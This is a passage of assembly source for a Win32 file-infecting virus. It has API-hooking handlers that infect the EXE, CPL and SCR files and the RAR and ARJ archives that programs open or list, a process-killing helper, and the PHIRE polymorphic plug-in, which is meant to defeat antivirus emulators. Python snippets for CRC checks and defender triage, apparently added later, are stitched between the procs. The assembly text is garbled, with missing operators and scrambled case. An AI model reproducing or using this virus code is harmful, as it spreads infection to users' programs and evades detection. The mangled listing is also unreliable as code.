POP ESI; Remove Shit from stack

Movzx Eax, Word PTR [EBP Counter]; AX = Counter

SHL EAX, 1; * 2 ​​(It's an array of words)

Add Eax, DWORD PTR [EBP OrdinalTableva]; Normalize

XCHG EAX, ESI; ESI = PTR 2 Ordinal; Eax = 0

Lodsw; Get Ordinal In AX

Cwde; Clear MSW of Eax

SHL Eax, 2; and with it we go to the

Add Eax, DWORD PTR [EBP AddResStableva]; AddresStable (Array of

XCHG ESI, EAX; DWORDS)

Lodsd; Get Address of API RVA

Add Eax, [EBP TMPMODULEBASE]; and Normalize !! That's it!

RET

GetApi_Et_Crc32 ENDP

; Input:

;   EAX = number to align

;   ECX = alignment factor

; Output:

;   EAX = aligned number

;

Align Proc

Push Edx

XOR EDX, EDX

Push EAX

Div ECX

POP EAX

SUB ECX, EDX

Add Eax, ECX

POP EDX

RET

Align ENDP

; Input:

;   ECX = offset where to truncate

; Output:

;   Nothing.

;

Truncfile Proc

XOR EAX, EAX

Push EAX

Push EAX

Push ECX

Push DWORD PTR [EBP FILEHANDLE]

Apicall_setfilepointer

Push DWORD PTR [EBP FILEHANDLE]

Apicall_SETENDOFFILE

RET

Truncfile ENDP

; Input:

;   ESI = pointer to the file to open

; Output:

;   EAX = handle / INVALID_HANDLE_VALUE

OpenFile Proc

XOR EAX, EAX

Push EAX

Push EAX

Push 00000003H

Push EAX

INC EAX

Push EAX

Push 80000000h OR 40000000H

PUSH ESI

Apicall_createfilea

RET

OpenFile Endp

; Input:

;   ECX = size to map

; Output:

;   EAX = mapping handle / error

CreateMap Proc

XOR EAX, EAX

Push EAX

Push ECX

Push EAX

Push 00000004H

Push EAX

Push DWORD PTR [EBP FILEHANDLE]

Apicall_createfilemappinga

RET

CreateMap ENDP

; Input:

;   ECX = size to map

; Output:

;   EAX = mapping address / error

;

MapFile Proc

XOR EAX, EAX

Push ECX

Push EAX

Push EAX

Push 00000002H

Push DWORD PTR [EBP MAPHANDLE]

Apicall_mapviewoffile

RET

MapFile Endp

; Input:

;   EDI = pointer to the name of the window of the process we want to kill

; Output:

;   Nothing.

;

TerminateProc Proc

XOR EBX, EBX; ThNX 2 Bennyg0d :)

Push EDI

Push EBX

Apicall_findWindowa

XCHG EAX, ECX

Jecxz TP_ERROREXIT

Push EBX

Push EBX

Push 00000012H

Push ECX

Apicall_PostMessagea

Test Al, 00h

Org $ -1

TP_ERROREXIT:

STC

RET

TERMINATEPROC ENDP

; Input:

;   ESI = pointer to the code to process

;   EDI = size of such code

; Output:

;   EAX = CRC32 of that code

;

CRC32 PROC

CLD

XOR ECX, ECX; Optimized by me - 2 bytes

DEC ECX; Less

MOV EDX, ECX

Push EBX

Nextbytecrc:

XOR EAX, EAX

XOR EBX, EBX

Lodsb

XOR Al, Cl

MOV CL, CH

MOV CH, DL

MOV DL, DH

MOV DH, 8

NextbitCrc:

SHR BX, 1

RCR AX, 1

JNC NOCRC

XOR AX, 08320H

XOR bx, 0edb8h

NOCRC: DEC DH

JNZ nextbitCrc

XOR ECX, EAX

XOR EDX, EBX

Dec Edi; Another Fool Byte Less

Jnz nextbytecrc

POP EBX

Not Edx

NOT ECX

MOV EAX, EDX

ROL EAX, 16

MOV AX, CX

RET

CRC32 ENDP
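Added example (Python, not from the listing), serving the CRC32 proc above and the GetAPI_ET_CRC32 resolver: the proc ported bit for bit and cross-checked against zlib, then used the way an analyst works backwards from hash constants found in a sample to the export names they stand for. Assumptions: names are hashed without their terminating NUL, and the HOOKED_APIS list is taken from the hook handlers on this page; the numeric CRC constants themselves are not in the listing and are recomputed here.

```python
import zlib

POLY = 0xEDB88320   # the two XOR immediates of the proc: 08320h into AX, 0EDB8h into BX


def crc32_listing(data):
    """Bit-for-bit port of the CRC32 proc: the state starts as 0FFFFFFFFh (xor ecx,ecx /
    dec ecx), each input byte is xored into the low state byte, the state moves down one
    byte (mov cl,ch / mov ch,dl / mov dl,dh), eight shr/rcr/xor rounds turn that byte into
    the table value xored back in, and the result is complemented (not edx / not ecx)."""
    if not data:
        raise ValueError("the proc counts EDI down with DEC/JNZ, so it needs at least one byte")
    crc = 0xFFFFFFFF
    for b in data:
        t = (crc ^ b) & 0xFF          # xor al,cl  (bx:ax starts as 0:byte)
        crc >>= 8                     # byte shift of the state
        for _ in range(8):            # shr bx,1 / rcr ax,1 / jnc / xor ax,8320h ; xor bx,0EDB8h
            t = (t >> 1) ^ POLY if t & 1 else t >> 1
        crc ^= t                      # xor ecx,eax / xor edx,ebx
    return crc ^ 0xFFFFFFFF           # not edx / not ecx, then eax = dx:cx


def matches_zlib(data):
    """Cross-check against the reference implementation (standard reflected CRC-32)."""
    return crc32_listing(data) == zlib.crc32(data)


# Export names the hook handlers on this page resolve by hash (list taken from the page).
HOOKED_APIS = ["MoveFileA", "CopyFileA", "GetFullPathNameA", "DeleteFileA", "WinExec",
               "CreateFileA", "CreateProcessA", "GetFileAttributesA", "SetFileAttributesA",
               "_lopen", "MoveFileExA", "CopyFileExA", "OpenFile", "GetProcAddress",
               "FindFirstFileA", "FindNextFileA"]


def hash_table(names):
    """hash -> name; assumes (as this example does) that the NUL terminator is not hashed."""
    return {crc32_listing(n.encode("ascii")): n for n in names}


def resolve_hashes(hashes, table):
    """Turn hash constants recovered from a sample back into API names; unknown -> '?'."""
    return [table.get(h & 0xFFFFFFFF, "?") for h in hashes]


def find_export(exports, wanted_hash):
    """What GetAPI_ET_CRC32 does over the export name table: hash each exported name in
    order until one matches; returns (name, address) or None."""
    for name, address in exports:
        if crc32_listing(name.encode("ascii")) == wanted_hash:
            return name, address
    return None
```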

; Input:

;   ESI = offset where to check for the MZ mark

; Output:

;   CF = set if fail, clear if all OK.

;

Checkmz Proc

Pushad

Call CMZ_SetSeh

MOV ESP, [ESP 08H]

JMP CMZ_EXIT

CMZ_SETSEH:

XOR EDX, EDX

Push DWORD PTR FS: [EDX]

MOV FS: [EDX], ESP

CMP Word PTR [ESI], "ZM"

JNZ CMZ_EXIT

Test Al, 00h

Org $ -1

CMZ_EXIT:

STC

Push 00h; ThanX 2 Super for Pointing

POP EDX; ME A BUG Here :)

POP DWORD PTR FS: [EDX]

POP EDX

Popad

RET

Checkmz endp

; Input:

;   TOS+00 = return address

;   TOS+04 = size of what we want to know the checksum of

;   TOS+08 = address where to begin calculating the checksum

; Output:

;   EAX = checksum

;

Checksum Proc Pascal LPFILE: DWORD, DWFILEN: DWORD

XOR EDX, EDX

Mov ESI, LPFILE

MOV ECX, DWFilelen

SHR ECX, 1

@CSUMLOOP:

Movzx Eax, Word PTR [ESI]

Add Edx, EAX

MOV EAX, EDX

Movzx EDX, DX

SHR EAX, 10h

Add Edx, EAX

Inc ESI

Inc ESI

Loop @csumloop

MOV EAX, EDX

SHR EAX, 10h

Add Ax, DX

Add Eax, DWFilelen

RET

Checksum ENDP

; Input:

;   EDI = where to generate the 6 char string

; Output:

;   Nothing.

;

GenerateName Proc

Push 6; Generate In [EDI] a 6 char

POP ECX; Name

GCL00P: Call Genchar

Stosb

LOOP GCL00P

RET

Genchar:

Call Random; Generate Letter Between

And Al, 25D; A and Z:]

Add Al, 41H

RET

GenerateName Endp
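Added defender-side example (Python, standard library only; not part of the listing) serving the Infection routine, the Checksum proc and GenerateName above: it reads the PE32 header fields the infection writes (the +28h entry point, +58h CheckSum and +0A0h base-relocation directory the listing addresses from the PE signature, plus the section table), recomputes the checksum with the same 16-bit fold, and derives which letters GenerateName can actually produce from AND AL,25 / ADD AL,41h. The PE skeleton built by build_sample is constructed test input, and the section flag values and the 'QRAYBJ' name in the test are made up for the demonstration.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def generatename_alphabet():
    """Letters GenerateName can emit: AND AL,25 keeps only bits 0, 3 and 4 of the
    random byte, so only 8 of the 26 letters are reachable after ADD AL,41h."""
    return sorted({chr((b & 25) + 0x41) for b in range(256)})


def pe_checksum(data, skip_offset=None):
    """16-bit end-around-carry sum of the file plus its length, as in the Checksum
    proc (which sums the whole mapped buffer). The standard PE algorithm also skips
    the CheckSum field itself; pass its offset as skip_offset to do that."""
    total = 0
    for i in range(0, len(data) - 1, 2):
        if skip_offset is not None and skip_offset <= i < skip_offset + 4:
            continue
        total += data[i] | (data[i + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)   # movzx edx,dx / shr eax,10h / add edx,eax
    total = (total & 0xFFFF) + (total >> 16)       # shr eax,10h / add ax,dx
    return (total + len(data)) & 0xFFFFFFFF        # add eax,dwFileLen


def parse_pe32(data):
    """Read the PE32 header fields the Infection routine touches; offsets from the PE
    signature match the listing (+28h entry point, +58h CheckSum, +0A0h reloc dir)."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 0x14)[0]
    if struct.unpack_from("<H", data, e_lfanew + 0x18)[0] != 0x10B:
        raise ValueError("PE32 only")
    entry = struct.unpack_from("<I", data, e_lfanew + 0x28)[0]
    checksum = struct.unpack_from("<I", data, e_lfanew + 0x58)[0]
    reloc = struct.unpack_from("<II", data, e_lfanew + 0xA0)
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, e_lfanew + 0x18 + opt_size + i * 40)
        sections.append({"name": f[0].rstrip(b"\0").decode("latin-1"), "vsize": f[1],
                         "va": f[2], "rawsize": f[3], "flags": f[9]})
    return {"entry": entry, "checksum": checksum, "checksum_offset": e_lfanew + 0x58,
            "reloc": reloc, "sections": sections}


def triage(data):
    """Indicators the Infection routine leaves behind: entry point redirected into the
    enlarged, writable+executable last section, relocation directory nulled, the renamed
    .reloc section carrying a GenerateName-style name, and a stale header checksum."""
    pe = parse_pe32(data)
    secs = pe["sections"]
    findings = []
    ep_sec = next((s for s in secs
                   if s["va"] <= pe["entry"] < s["va"] + max(s["vsize"], s["rawsize"])), None)
    if len(secs) > 1 and ep_sec is secs[-1]:
        findings.append("entry point in last section")
    if ep_sec and ep_sec["flags"] & IMAGE_SCN_MEM_WRITE and ep_sec["flags"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry section is writable and executable")
    if pe["reloc"] == (0, 0):
        findings.append("base-relocation directory zeroed")
    alphabet = set(generatename_alphabet())
    for s in secs:
        if len(s["name"]) == 6 and set(s["name"]) <= alphabet:
            findings.append("section name %r fits GenerateName's alphabet" % s["name"])
    if pe["checksum"] and pe["checksum"] != pe_checksum(data, pe["checksum_offset"]):
        findings.append("header checksum does not match")
    return findings


def build_sample(sections, entry_rva, reloc=(0, 0)):
    """Constructed PE32 skeleton (headers plus zero-filled sections, no real code) so
    triage() can run offline; sections is a list of (name, characteristics)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    nsec, opt_size = len(sections), 0xE0
    file_hdr = struct.pack("<HHIIIHH", 0x14C, nsec, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0x00, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 0x10, entry_rva)             # AddressOfEntryPoint
    struct.pack_into("<I", opt, 0x1C, 0x400000)              # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)        # Section/FileAlignment
    struct.pack_into("<I", opt, 0x38, 0x1000 * (nsec + 1))   # SizeOfImage
    struct.pack_into("<I", opt, 0x3C, 0x400)                 # SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)                    # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x88, *reloc)               # base-relocation directory
    sec_tbl = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), 0x1000, 0x1000 * (i + 1),
                    0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections))
    image = bytearray((dos + b"PE\0\0" + file_hdr + bytes(opt) + sec_tbl).ljust(0x400, b"\0")
                      + b"\0" * (0x200 * nsec))
    cs_off = e_lfanew + 0x58
    struct.pack_into("<I", image, cs_off, pe_checksum(bytes(image), cs_off))  # valid checksum
    return bytes(image)
```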

; Input:

;   EAX = CRC32 of the API we want to get info on

; Output:

;   EAX = API address

;   EBX = API in import table

GetApi_it_Crc32 Proc

MOV DWORD PTR [EBP TEMPGA_IT1], EAX

MOV ESI, DWORD PTR [EBP ImageBase]

Add ESI, 3CH

Lodsw

CWDE

Add Eax, DWORD PTR [EBP ImageBase]

XCHG ESI, EAX

Lodsd

CMP EAX, "EP"

JNZ NOPES

Add ESI, 7CH

Lodsd

Push EAX

Lodsd

MOV ECX, EAX

POP ESI

Add ESI, DWORD PTR [EBP ImageBase]

Searchk32:

PUSH ESI

MOV ESI, [ESI 0CH]

Add ESI, DWORD PTR [EBP ImageBase]

Lea EDI, [EBP K32_DLL]

MOV ECX, K32_SIZE

CLD

Push ECX

REP CMPSB

POP ECX

POP ESI

JZ Gotcha

Add ESI, 14H

JMP Searchk32

Gotcha:

CMP Byte PTR [ESI], 00H

JZ NOPES

Mov EDX, [ESI 10h]

Add Edx, DWORD PTR [EBP ImageBase]

Lodsd

OR EAX, EAX

JZ NOPES

XCHG EDX, EAX

Add Edx, [EBP ImageBase]

XOR EBX, EBX

LOOPY:

CMP DWORD PTR [EDX 00h], 00H

JZ NOPES

CMP BYTE PTR [EDX 03H], 80H

JZ Reloop

Mov Edi, [EDX]

Add Edi, DWORD PTR [EBP ImageBase]

Inc EDI

Inc EDI

MOV ESI, EDI

Pushad

EOSZ_EDI

Sub EDI, ESI

Call CRC32

MOV [ESP.PUSHAD_ECX], EAX

Popad

CMP DWORD PTR [EBP TEMPGA_IT1], ECX

JZ Wegotit

Reloop:

Inc EBX

Add EDX, 4

Loop LopY

Wegotit:

SHL EBX, 2

Add Ebx, EAX

MOV EAX, [EBX]

Test Al, 00h

Org $ -1

NOPES:

STC

RET

GetApi_it_Crc32 ENDP

; || THREAD used for hooking its desired APIs (per-process residence) ||

THRPERPROCESS Proc Pascal Delta_thread: DWORD

MOV EBP, DELTA_THREAD

XOR ECX, ECX

TPP_SLEP:

Mov Cl, Thread_sleeping

TPP_SEMAPHORE EQU $ -1

JECXZ TPP_SLEP

Pushad

Call tpp_setupseh

MOV ESP, [ESP 08H]

JMP TPP_RESTORESEHH

TPP_SETUPSEH:

XOR EDX, EDX

Push DWORD PTR FS: [EDX]

MOV FS: [EDX], ESP

Call Ienc_Decrypt

DD 00000000h

DD EBLOCKD-blockdd

Blockd label Byte

Call getk32

Push EAX

POP DWORD PTR [EBP TMPMODULEBASE]

Lea ESI, [EBP @@ hookz]

@@ hooker:

CLC

Lodsd

PUSH ESI

Call getApi_it_Crc32

POP ESI

JNC @@ hookshit

MOV EAX, [ESI-4]

Push EDI ESI

Call getapi_et_crc32

POP EDI ESI

Add Edi, 04H

Stosd

XCHG EDI, ESI

JMP @@ checkshit

@@ hookshit:

XCHG EAX, ECX

Lodsd

Add Eax, EBP

MOV [EBX], EAX

XCHG EAX, ECX

XCHG ESI, EDI

Stosd

XCHG ESI, EDI

@@ checkshit:

CMP Byte PTR [ESI], BILLY_BEL

JNZ @@ hooker

Eblockd label byte

TPP_RESTORESEH:

XOR EDX, EDX

POP DWORD PTR FS: [EDX]

POP EDX

Popad

AND Byte PTR [EBP TPP_SEMAPHORE], Thread_sleeping

JMP EXITTHREAD

THRPERPROCESS ENDP

; || Hooked API's Handlerz ||

Hookmovefilea:

Call dohookstuff

JMP DWORD PTR [EAX HMOVEFILEA]

HookcopyFilea:

Call dohookstuff

JMP DWORD PTR [EAX HCopyfilea]

HookgetFullPathnamea:

Call dohookstuff

JMP DWORD PTR [EAX HGETFULLLPATHNAMEA]

HookDeletefilea:

Call dohookstuff

JMP DWORD PTR [EAX HDeletefilea]

Hookwinexec:

Call dohookstuff

JMP DWORD PTR [EAX Hwinexec]

HookcreateFilea:

Call dohookstuff

JMP DWORD PTR [EAX HCREATEFILEA]

HookcreateProcessa:

Call dohookstuff

JMP DWORD PTR [EAX HCREATEPROCESSA]

HookgetFileAttributesa:

Call dohookstuff

JMP DWORD PTR [EAX HGETFILEATTRIBUTESA]

HooksetFileAttributesa:

Call dohookstuff

JMP DWORD PTR [EAX HSETFILEATTRIBUTESA]

HOOK_LOPEN:

Call dohookstuff

JMP DWORD PTR [EAX H_LOPEN]

Hookmovefileexa:

Call dohookstuff

JMP DWORD PTR [EAX HMOVEFILEXA]

HookcopyFileExa:

Call dohookstuff

JMP DWORD PTR [EAX HCopyFileExa]

HookOpenfile:

Call dohookstuff

JMP DWORD PTR [EAX Hopenfile]

HookgetProcaddress:

Pushad; save all the registers

Call Ienc_Decrypt

DD 00000000h

DD EBLOCKE-Blocke

Blocke label Byte

Call getdeltaoffset; ebp = delta offset

MOV EAX, [ESP 24h]; EAX = Base Address of Module

CMP EAX, DWORD PTR [EBP KERNEL]; Is EAX = K32?

Jnz OriginalGPa; if Not, IT's Not Our Problem

MOV [ESP.PUSHAD_EAX], EBP; Store Delta Offset

Popad

Pop DWORD PTR [EAX HGPA_RETADDRESS]; PUT RET Address in A Safe

; Place

Call DWORD PTR [EAX HGETPROCADDRESS]; CALL Original API

OR EAX, EAX; Fail? duh!

JZ HGPA_SEEYA

Pushad

XCHG EAX, EBX; EBX = Address of Function

Call getdeltaoffset; ebp = delta offset

MOV ECX, NHOOKEDAPIS; ECX = Number of Hoot API

Lea ESI, [EBP @@ hookz 08h]; ESI = PTR TO Array Of API

; addresses

XOR EDX, EDX; EDX = Counter (Set to 0)

HGPA_ISHOKABLEAPI ?:

Lodsd; eax = address of a hooded API

CMP EBX, EAX; Is Equal To Requested Address?

JZ HGPA_INDEEDITITISI; if Yes, IT's INTERESTING 4 US

Add ESI, 08H; Get Ptr To Another One

Inc EDX; Increase Counter

Loop HGPA_ISHOKABLEAPI?; Search Loop

JMP OriginalGPax

HGPa_indeeditis:

Lea ESI, [EBP @@ hookz 04h]

Imul Eax, EDX, 0CH; MULTIPLY PER 12

Add ESI, Eax; Get The Correct Offset

Lodsd; and get the value

Add Eax, EBP; Adjust It To Delta

MOV [ESP.PUSHAD_EAX], EAX

Popad; EAX = HOOKED API Address

Eblocke Label Byte

HGPa_seeya:

Push 12345678H

HGPA_RETDRESS EQU $ -4

RET

OriginalGPax:

MOV [ESP.PUSHAD_EAX], EBP; this is a jump to the Origi-

Popad; nal getprocaddress

Push DWORD PTR [EAX HGPA_RETADDRESS]

JMP DWORD PTR [EAX HGETPROCADDRESS]

OriginalGPA:

MOV [ESP.PUSHAD_EAX], EBP; this is a jump to the Origi-

Popad; nal getprocaddress

JMP DWORD PTR [EAX HGETPROCADDRESS]

Hookfindfirstfilea:

Pushad; Save All Reggies

Call Ienc_Decrypt

DD 00000000h

DD EBLOCKF-Blockf

Blockf label byte

Call getdeltaoffset; ebp = delta offset

MOV Eax, [ESP 20H]; EAX = RETURN Address

MOV DWORD PTR [EBP FFRETADDRESS], EAX

MOV Eax, [ESP 28H]; EAX = Ptr To Wfd

MOV DWORD PTR [EBP FF_WFD], EAX

Mov [ESP.PUSHAD_EAX], EBP; Save Delta Offset

Popad

Add ESP, 4; Remove this Ret Address from

; stack

Call DWORD PTR [EAX HFINDFIRSTFILEA]; CALL Original API

INC EAX

JZ _FF_GoAway

Dec EAX

JMP Twisted

_FF_GoAway:

Dec EAX

JMP FF_GoAway

Twisted:

Pushad; save reggies and flaggies

Pushfd

Call getdeltaoffset; delta again

Movzx EBX, Byte PTR [EBP WFD_Handles_Count]; Number of Active Hndlers

MOV EDX, [EBP WFD_HNDINMEM]; Our Handle Table In Mem

Eblockf label byte

Mov ESI, 12345678H; PTR to FileName

FF_WFD EQU $ -4

Add ESI, (Offset WFD_SZFILENAME-OFFSET WIN32_FIND_DATA)

CMP EBX, N_HANDLES; OVER MAX HND Storing?

Jae AvoidStoring; Shit ...

MOV DWORD PTR [EDX EBX * 8], EAX; Store Handle

MOV DWORD PTR [EDX EBX * 8 4], ESI; Store WFD Offset

Inc Byte PTR [EBP WFD_Handles_Count]

AvoidStoring:

PUSH ESI

Call Check4validFile; Is A Reliable File 4 INF?

POP EDI

JECXZ FF_AVOIDINFEKT; duh!

Dec ECX

JECXZ FF_INFPE

Call Infectorchiveedi

JMP FF_AVOIDINFEKT

FF_INFPE:

Call Infectedi; Infect IT

FF_AVOIDINFEKT:

POPFD

Popad

FF_Goaway:; return to caller

Push 12345678H

FFretaddress EQU $ -4

RET

HookfindNextFilea:

Pushad; Save All Reggies

Call Ienc_Decrypt

DD 00000000h

DD EBLOCK10-Block10

Block10 label byte

Call getDeltaoffset; Get Delta Offset

MOV Eax, [ESP 20H]; EAX = RETURN Address

MOV DWORD PTR [EBP Fnretaddress], EAX

MOV EAX, [ESP 24h]; EAX = Search Handle

MOV DWORD PTR [EBP FN_HND], EAX

Mov [ESP.PUSHAD_EAX], EBP; Save Delta Offset

Popad

Add ESP, 4; FIX Stack

Call DWORD PTR [EAX _FINDNEXTFILEA]; Call ORIGINAL API

OR EAX, EAX; Fail? DAMN.

JZ Fn_Goaway

Pushad; save regs and flags

Pushfd

Call getDeltaoffset; Get Delta Again

EBLOCK10 Label Byte

Mov Eax, 12345678h; Eax = Search Handle

Fn_HND EQU $ -4

Call Check4validhandle; Is in Our Table? if Yes,

JC Fn_avoidinfekt; infect.

XCHG ESI, ESI; ESI = Pointer to WFD

Add ESI, (Offset WFD_SZFILENAME-OFFSET WIN32_FIND_DATA)

Push ESI; ESI = PTR to FileName

Call Check4validFile; Is Reliable ITS INF.?

POP EDI

JECXZ FN_AVOIDINFEKT; DUH ...

Dec ECX

JECXZ FN_INFPE

Call Infectorchiveedi

JMP FN_AVOIDINFEKT

FN_INFPE:

Call Infectedi; Infect it!

Fn_avoidinfekt:

POPFD; Restore Flags & Regs

Popad

FN_Goaway:; return to caller

Push 12345678H

Fnretaddress EQU $ -4

RET

; || Standard API Handler ||

DOHOOKSTUFF:

Call Ienc_Decrypt

DD 00000000h

DD EBLOCK11-Block11

Block11 label byte

Pushhad

Pushfd

Call getDeltaoffset

MOV EDX, [ESP 2CH]; Get FileName to Infect

MOV ESI, EDX

Call Check4validfile

Jecxz errordohookstuff

XCHG EDI, EDX

Dec ECX

Jecxz Infectwithhookstuff

Infectanarchive:

Call Infectorchiveedi

JMP errordohookstuff

Infectwithhookstuff:

Call infectedi

ErrorDohookstuff:

POPFD; Preserve All As if nothing

Popad; happed :)

Push EBP

Call getDeltaoffset; Get Delta Offset

XCHG EAX, EBP

POP EBP

RET

Eblock11 label byte

; Input:

;   ESI = pointer to the file to check

; Output:

;   ECX = 0 -> not a valid file

;   ECX = 1 -> possible PE file

;   ECX = 2 -> possible archive

;

Check4validfile:

XOR ECX, ECX

Lodsb

OR Al, Al; FIND NULL? SHIT ...

JZ C4VF_ERROR

CMP Al, "."; DOT FOUND? INTERESTING ...

Jnz Check4validFile

Dec ESI

Lodsd; Put Extension in Eax

OR Eax, 20202020h; make string locase

NOT EAX

CMP EAX, NOT "EXE."; Is IT An EXE? Infect !!!

JZ C4VF_SUCCCESSFUL

CMP EAX, NOT "LPC."; Is IT A CPL? Infect !!!

JZ C4VF_SUCCCESSFUL

CMP EAX, NOT "RCS."; Is IT A SCR? Infect !!!

JZ C4VF_SUCCCESSFUL

CMP EAX, NOT "RAR."; Is IT A RAR? Infect !!!

JZ C4VF_SUCCESSFULARCHIVE

CMP EAX, NOT "JRA."; Is IT An Arj? Infect !!!

JZ C4VF_SUCCESSFULARCHIVE

C4VF_ERROR:

RET

C4VF_SUCCESSFULARCHIVE:

Inc ECX

C4VF_Successful:

Inc ECX

RET

; Input:

;   Nothing.

; Output:

;   EBP = delta offset

;

GetDeltaoffset:

Call @x1

@x1: pop ebp

sub EBP, OFFSET @x1

RET

; Input:

;   EAX = handle

; Output:

;   EAX = WFD offset of the given handle

;   EDX = place it occupies in the WFD_Handles structure

;   CF = set to 1 if it's found, to 0 if it wasn't

;

Check4validHandle:

XOR EDX, EDX

mov edi, [ebp+WFD_HNDINMEM]

C4VH_L00P:

CMP EDX, N_HANDLES; OVER LIMITS? SHIT ...

JAE C4VH_ERROR

cmp eax, [edx*8+edi] ; EAX = a handle stored in

JZ C4VH_Successful; TABLE

Inc EDX; Increase Counter

JMP C4VH_L00P

C4VH_SUCCESSFUL:

mov eax, [edx*8+edi+4] ; EAX = WFD offset

Test Al, 00h

Org $ -1

C4VH_ERROR:

STC

RET

;=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=
; [PHIRE] - Polymorphic Header Idiot Random Engine v1.00 (MMXE plug-in)
;=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=

;

; This is a plug-in for MMXE v1.01 that is able to generate a polymorphic
; block of code (size defined by the user) capable of killing emulators and
; hiding the real entrypoint from AV. This is an EPO plug-in for my MMXE. Why
; do I say it's a plug-in? Well, it wouldn't work without MMXE, and it adds
; features to that engine that it previously didn't have. So, don't doubt it:
; it's a plug-in ;)

;

; PHIRE will generate some code like the following:
;
;       [...]
;       call    @@1
;       [...]
;       mov     esp,[esp+08h]
;       [...]
;       pop     dword ptr fs:[0000h]
;       [...]
;       add     esp,4
;       [...]
;       jmp     mmxe_decryptor
;       [...]
; @@1:  push    dword ptr fs:[0000h]
;       [...]
;       mov     dword ptr fs:[0000h],esp
;       [...]
;  * -> from here until completing the 256 bytes of code, we fill this
;       with random data, so an exception will surely happen :)

;

; (Each '[...]' means garbage code.) This will be placed at the original entry-
; point of the infected file, and stops all the current emulators. So, this
; plug-in makes the virus undetectable heuristically.

;

; Input:
;   EDI = buffer where to put the generated polymorphic code
;   EAX = distance between host entry-point and virus entry-point
;   EBP = delta offset
; Output:
;   Nothing.
;
; All registers are preserved.
;

PLIMIT EQU 100H

PHIRE PROC

pushad

Call Ienc_Decrypt

DD 00000000h

DD EBLOCK12-Block12

Block12 label byte

MOV DWORD PTR [EBP @@ p_buffer], EDI

MOV DWORD PTR [EBP @@ p_distance], EAX

Push Edi; Clear Work Area

XOR EAX, EAX

Mov ECX, PLIMIT

Rep Stosb

POP EDI

And DWORD PTR [EBP @@reg_key], 00h; CLEAR ALL Registers :)

Call @@ clean_mask

AND BYTE PTR [EBP @@ init_mmx?], 00H; Don't Allow MMX Garbage

Call @@ gen_garbage

MOV Al, 0e8h; Write the Provisional Call

Stosb

XOR EAX, EAX

Stosd

MOV DWORD PTR [EBP @@ p_tmp_call], EDI

Call @@ gen_garbage

Mov Eax, @@ s_stack_fix; generate some Similar Code

Call R_Range; To MoV ESP, [ESP 08H]

Lea EBX, [EBP @@ stack_fix]

MOV EAX, [EBX EAX * 4]

Add Eax, EBP

Call EAX

Call @@ gen_garbage

MOV EAX, @@ s_seh_restore; Generate SomeciLA

Call R_Range; To Pop Fs: [0000H]

Lea EBX, [EBP @@ seh_restore]

mov eax, [ebx+eax*4]

add eax, ebp

Call EAX

Call @@ gen_garbage

MOV Eax, @@ s_stack_fix_nh; generate some similar code

Call R_Range; To Add ESP, 4

Lea EBX, [EBP @@ stack_fix_nh]

MOV EAX, [EBX EAX * 4]

Add Eax, EBP

Call EAX

Call @@ gen_garbage

Call @@jump_to_decryptor; generate the jump to the

Decryptor

Call @@ gen_garbage

MOV EBX, EDI; Call After SEH HANDLER

MOV EAX, DWORD PTR [EBP @@ p_tmp_call]

SUB EBX, EAX

MOV [EAX-4], EBX

Call @@ gen_garbage

MOV Eax, @@ s_seh_saveold; generate some Similar Code

Call r_range; to push fs: [0000H]

Lea EBX, [EBP @@ seh_save_old]

MOV EAX, [EBX EAX * 4]

Add Eax, EBP

Call EAX

Call @@ gen_garbage

MOV Eax, @@ s_seh_newhnd; Generate Somilar Code

Call R_Range; To Mov FS: [0000H], ESP

Lea EBX, [EBP @@ seh_newhnd]

MOV EAX, [EBX EAX * 4]

Add Eax, EBP

Call EAX

Call @@ gen_garbage

Mov Eax, Plimit

MOV ECX, DWORD PTR [EBP @@ p_buffer]

MOV EBX, EDI

SUB EBX, ECX

Sub Eax, EBX

XCHG ECX, EAX

@@ Fill_L00P:

Call Random

Stosb

Loop @@ Fill_L00P

Popad

RET

DB 00H, "[PHIRE V1.00]", 00h

@@choose_aux1_reg:

Mov Eax, 08h

Call R_Range

OR EAX, EAX

JZ @@choose_aux1_reg

CMP Eax, _esp

JZ @@choose_aux1_reg

CMP Al, Byte PTR [EBP @@reg_aux2]

JZ @@choose_aux1_reg

MOV BYTE PTR [EBP @@reg_aux1], al

RET

@@choose_aux2_reg:

Mov Eax, 08h

Call R_Range

OR EAX, EAX

JZ @@choose_aux2_reg

CMP Eax, _esp

JZ @@choose_aux2_reg

CMP AL, BYTE PTR [EBP @@reg_aux1]

JZ @@choose_aux2_reg

MOV BYTE PTR [EBP @@reg_aux2], Al

RET

; Generate the jump to the MMXE decryptor
@@jump_to_decryptor:

Mov al, 0e9h

Stosb

XOR EAX, EAX

Stosd

MOV EBX, EDI

SUB EBX, DWORD PTR [EBP @@ p_buffer]

MOV EAX, DWORD PTR [EBP @@ p_distance]

Sub Eax, EBX

Mov DWORD PTR [EDI-4], EAX

RET

; ----

FIXING Stack After Fault - Type 1:

; MOV ESP, [ESP 08H]

@@ stack_fix_type1:

Mov Eax, 0824648BH

Stosd

RET

FIXING Stack After Fault - Type 2:

; MOV REG, ESP

Mov ESP, [REG 08H]

@@ stack_fix_type2:

MOV Al, 08BH

